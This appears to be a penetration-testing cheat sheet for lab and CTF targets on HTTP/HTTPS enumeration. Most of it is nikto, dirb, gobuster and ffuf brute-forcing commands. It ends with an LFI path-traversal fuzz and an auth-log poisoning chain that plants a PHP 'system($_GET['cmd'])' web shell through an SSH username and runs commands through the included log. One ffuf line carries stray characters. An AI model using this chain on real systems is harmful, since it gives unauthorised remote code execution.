HTTP and HTTPS

Port 80 and 443

nikto -h 10.10.10.10

Dirb

dirb http://10.10.10.228/

Dirbuster

Gobuster gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.237/

gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt dir -u http://10.10.10.237/ -t 42 -x .php,.txt

gobuster -w /SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://monitors.htb

To bypass if status code is 200 or 400 for all directories, use -b. else we can use -s to include response-codes. gobuster dir -u http://192.168.206.148:12380/ -w ../directory-list-2.3-medium.txt -t 32 -x .php,.txt -b 400

FFUF ffuf -w SecLis­ts/­Dis­cov­ery­/DN­S/s­ubd­oma­ins­-to­p1m­ill­ion­-50­00.txt -u http:/­/un­dis­cov­ere­d.thm/ -H "­Host: FUZZ.u­ndi­sco­ver­ed.t­hm­" -fc 302

ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u "http://192.168.120.14/secret_information/?lang=../../../../../../../FUZZ"

For .php file, try with LFI parameters. ?file= Auth Log Bypass

 ssh '<?php system($_GET['cmd']); ?>'@192.168.120.170

http://192.168.120.80/console/file.php?file=../../../../../var/log/auth.log&cmd=id

PreviousScanning and EnumerationNextSMB | Windows Domain Enumeration

Last updated

Was this helpful?